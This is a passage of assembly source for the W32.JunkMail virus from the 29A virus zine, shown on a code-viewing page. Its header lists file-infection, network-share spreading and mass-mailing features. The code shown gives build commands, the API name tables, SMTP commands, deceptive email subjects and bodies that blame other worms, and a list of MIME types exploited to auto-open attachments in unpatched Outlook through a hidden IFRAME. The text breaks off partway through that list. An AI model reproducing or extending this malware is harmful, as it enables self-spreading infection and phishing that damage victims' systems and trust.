?? 29a-7.005
字號:
comment ;)
W32.JunkMail by roy g biv / RT Fishel
some of its features:
- parasitic resident (own process) infector of PE exe (but not looking at suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal is linked-list instead of recursive to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- slow mailer using polymorphic mail headers and transport (text/OLE2/binary)
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs in writable memory)
- no infect files with data outside of image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before W32.EfishNC :)
yes, just a W32.EfishNC remake with SMTP client engine
---
optimisation tip: Windows appends ".dll" automatically, so this works:
push "cfs"
push esp
call LoadLibraryA
---
to build this thing:
tasm
----
tasm32 /ml /m3 junkmail
tlink32 /B:400000 /x junkmail,,,import32
Virus is not self-modifying, so no need to alter section attributes
---
We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)
(;
.486
.model flat
extern GlobalAlloc:proc
extern CreateFileA:proc
extern GetFileSize:proc
extern GetModuleFileNameA:proc
extern ReadFile:proc
extern WriteFile:proc
extern CloseHandle:proc
extern GlobalFree:proc
extern GetCurrentProcess:proc
extern WriteProcessMemory:proc
extern MessageBoxA:proc
extern ExitProcess:proc
.data
;to alter the text here, set compress_only to not-zero then run
;in that case, the compressed text is written to a file only
compress_only equ 0
ife compress_only
;must be reverse alphabetical order because they are stored on stack
;API names are not present in replications, only in dropper
expnames db "WriteFile" , 0
db "WinExec" , 0
db "SetFileAttributesA" , 0
db "MoveFileA" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetWindowsDirectoryA", 0
db "GetTickCount" , 0
db "GetTempFileNameA" , 0
db "GetFileAttributesA" , 0
db "GetCurrentProcess" , 0
db "DeleteFileA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
regnames db "RegSetValueA" , 0
db "OpenSCManagerA" , 0
db "CreateServiceA" , 0
db "CloseServiceHandle", 0
exenames db "LoadLibraryA" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetStartupInfoW", 0
db "GetStartupInfoA", 0
db "GetCommandLineW", 0
db "GetCommandLineA", 0
db "ExitProcess" , 0
db "CreateProcessW" , 0
db "CreateProcessA" , 0
usrnames db "CharNextW", 0
db "CharNextA", 0
svcnames db "StartServiceCtrlDispatcherA", 0
krnnames db "lstrlenW" , 0
db "lstrcpyW" , 0
db "lstrcatW" , 0
db "UnmapViewOfFile" , 0
db "Sleep" , 0
db "SetFileTime" , 0
db "SetFileAttributesW" , 0
db "SetFileAttributesA" , 0
db "SetCurrentDirectoryW" , 0
db "SetCurrentDirectoryA" , 0
db "ReadFile" , 0
db "MultiByteToWideChar" , 0
db "MapViewOfFile" , 0
db "LoadLibraryA" , 0
db "GlobalFree" , 0
db "GlobalAlloc" , 0
db "GetVersion" , 0
db "GetTickCount" , 0
db "GetModuleFileNameA" , 0
db "GetFullPathNameW" , 0
db "GetFullPathNameA" , 0
db "GetFileSize" , 0
db "GetDriveTypeA" , 0
db "FindNextFileW" , 0
db "FindNextFileA" , 0
db "FindFirstFileW" , 0
db "FindFirstFileA" , 0
db "FindClose" , 0
db "CreateThread" , 0
db "CreateFileW" , 0
db "CreateFileMappingA" , 0
db "CreateFileA" , 0
db "CloseHandle" , 0
sfcnames db "SfcIsFileProtected", 0
ws2names db "socket" , 0
db "send" , 0
db "gethostbyname", 0
db "connect" , 0
db "WSAStartup" , 0
netnames db "WNetOpenEnumW" , 0
db "WNetOpenEnumA" , 0
db "WNetEnumResourceW", 0
db "WNetEnumResourceA", 0
db "WNetCloseEnum" , 0
ip9xnames db "NetShareEnum", 0
ipntnames db "NetShareEnum" , 0
db "NetApiBufferFree", 0
endif
;only 0dh is required for new line, since 0ah is appended by decompressor
user1 equ ' '
user2 equ '-'
user3 equ '/' ;the three most frequent characters
ourcid equ "EMAIL" ;something that users will open
smtp1 db offset smtp2 - offset $ - 2, "HELO ", 0
smtp2 db offset smtp3 - offset $ - 2, "MAIL FROM:<>", 0dh, 0
smtp3 db offset smtp4 - offset $ - 2, "RCPT TO:", 0
smtp4 db offset header1 - offset $ - 2, "DATA", 0dh, 0
header1 db offset header2 - offset $ - 2, "FROM: ", 0
header2 db offset subject1 - offset $ - 2, "SUBJECT: ", 0
;-----------------------------------------------------------------------------
;e-mail subject texts
;high bit set for list of phrases from which to choose randomly
;other bits are number of entries in list
;-----------------------------------------------------------------------------
subject1 db 83h
db offset subject1b - offset $ - 1, "Does this belong to you"
subject1b db offset subject1c - offset $ - 1, "Do you own this file"
subject1c db offset subject1d - offset $ - 1, "Is this your file"
subject1d equ $
subject2 db offset subject2b - offset $ - 1, " - "
subject2b db 0
header31 db offset header32 - offset $ - 2, ".ZIP", 0dh, "MIME-VERSION:", 0
header32 db offset part11 - offset $ - 2, "1.0", 0
part11 db offset part12 - offset $ - 2, "CONTENT-TYPE:", 0
part12 db offset part13 - offset $ - 2, "MULTIPART/MIXED;", 0
part13 db offset body1 - offset $ - 2, " BOUNDARY=", 0
;-----------------------------------------------------------------------------
;e-mail body texts
;high bit set for list of phrases from which to choose randomly
;other bits are number of entries in list
;-----------------------------------------------------------------------------
body1 db offset body2 - offset $ - 1
db 0dh, "I received this file from you yesterday "
body2 db 83h
db offset body2b - offset $ - 1, "afternoon"
body2b db offset body2c - offset $ - 1, "evening"
body2c db offset body2d - offset $ - 1, "morning"
body2d equ $
body3 db offset body4 - offset $ - 1
db ".", 0dh, "I think it was sent without you knowing by the "
body4 db 87h
db offset body4b - offset $ - 1, "Aliz"
body4b db offset body4c - offset $ - 1, "Badtrans"
body4c db offset body4d - offset $ - 1, "Goner"
body4d db offset body4e - offset $ - 1, "Klez"
body4e db offset body4f - offset $ - 1, "Magistr"
body4f db offset body4g - offset $ - 1, "Nimda"
body4g db offset body4h - offset $ - 1, "Sircam"
body4h equ $
body5 db offset body6 - offset $ - 1, " "
body6 db 83h
db offset body6b - offset $ - 1, "trojan"
body6b db offset body6c - offset $ - 1, "virus"
body6c db offset body6d - offset $ - 1, "worm"
body6d equ $
body7 db offset body8 - offset $ - 1, ".", 0dh
db "The filename was "
;be careful here: remember that line length is 76 characters
body8 db 83h
db offset body8b - offset $ - 1, "alter"
body8b db offset body8c - offset $ - 1, "chang"
body8c db offset body8d - offset $ - 1, "replac"
body8d equ $
body9 db offset bodya - offset $ - 1
db "ed but it looked like an important "
bodya db 85h
db offset bodyab - offset $ - 1, "database"
bodyab db offset bodyac - offset $ - 1, "document"
bodyac db offset bodyad - offset $ - 1, "picture"
bodyad db offset bodyae - offset $ - 1, "spredsheet" ;reduce size
bodyae db offset bodyaf - offset $ - 1, "video"
bodyaf equ $
bodyb db offset bodyc - offset $ - 1
db " inside.", 0dh, "You should look at this file to see what it is.", 0dh
bodyc db offset bodyd - offset $ - 1
db "The attachment might open automatically. This is normal behaviour.", 0dh
bodyd db offset bodye - offset $ - 1
db "If you see a prompt to Open or Save the email then choose Open.", 0dh
bodye db offset bodyf - offset $ - 1
db "If the attachment is blocked by Outlook 2002 then see", 0dh
bodyf db offset bodyg - offset $ - 1
db "http://support.microsoft.com/support/kb/articles/q290/4/97.asp", 0dh
bodyg db 0
part21 db offset part22 - offset $ - 2, "TEXT/HTML", 0
part22 db offset part23 - offset $ - 2, 0dh, "CONTENT-TRANSFER-ENCODING:", 0
part23 db offset part24 - offset $ - 2, "QUOTED-PRINTABLE", 0
part24 db offset content - offset $ - 2, 0dh, 0dh, "<IFRAME SRC=CID:", ourcid, " WIDTH=0>", 0
;-----------------------------------------------------------------------------
;these types open without prompt in unpatched Outlook
;-----------------------------------------------------------------------------
content db 9bh ;total of exploited, CIDs, and not-exploited types
db offset autorunb - offset $ - 1, "APPLICATION/X-MPLAYER2;"
autorunb db offset autorunc - offset $ - 1, "AUDIO/AIFF;"
autorunc db offset autorund - offset $ - 1, "AUDIO/MID;"
autorund db offset autorune - offset $ - 1, "AUDIO/MIDI;"
autorune db offset autorunf - offset $ - 1, "AUDIO/MPEG;"
autorunf db offset autorung - offset $ - 1, "AUDIO/X-MID;"
autorung db offset autorunh - offset $ - 1, "AUDIO/X-MIDI;"
autorunh db offset autoruni - offset $ - 1, "AUDIO/X-MPEGURL;"
autoruni db offset autorunj - offset $ - 1, "AUDIO/X-MS-WAX;"
autorunj db offset autorunk - offset $ - 1, "AUDIO/X-MS-WMA;"
autorunk db offset autorunl - offset $ - 1, "AUDIO/X-WAV;"
autorunl db offset autorunm - offset $ - 1, "MIDI/MID;"
autorunm db offset autorunn - offset $ - 1, "VIDEO/MSVIDEO;"
autorunn db offset autoruno - offset $ - 1, "VIDEO/QUICKTIME;"
autoruno db offset autorunp - offset $ - 1, "VIDEO/X-IVF;"
autorunp db offset autorunq - offset $ - 1, "VIDEO/X-MPEG;"
autorunq db offset autorunr - offset $ - 1, "VIDEO/X-MPEG2A;"
autorunr db offset autoruns - offset $ - 1, "VIDEO/X-MS-ASF;"
autoruns db offset autorunt - offset $ - 1, "VIDEO/X-MS-ASF-PLUGIN;"
autorunt db offset autorunu - offset $ - 1, "VIDEO/X-MS-WM;"
autorunu db offset autorunv - offset $ - 1, "VIDEO/X-MS-WMV;"
autorunv db offset autorunw - offset $ - 1, "VIDEO/X-MS-WVX;"
autorunw equ $
;-----------------------------------------------------------------------------
;these are types that display the CID instead of the filename,
;so using a good choice for CID (eg email) will make many users open it
;-----------------------------------------------------------------------------
db offset usecidb - offset $ - 1, "APPLICATION/FUTURESPLASH;"
usecidb db offset usecidc - offset $ - 1, "APPLICATION/HTA;"
usecidc db offset usecidd - offset $ - 1, "APPLICATION/X-SHOCKWAVE-FLASH;"
usecidd db offset usecide - offset $ - 1, "TEXT/X-SCRIPTLET;"
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -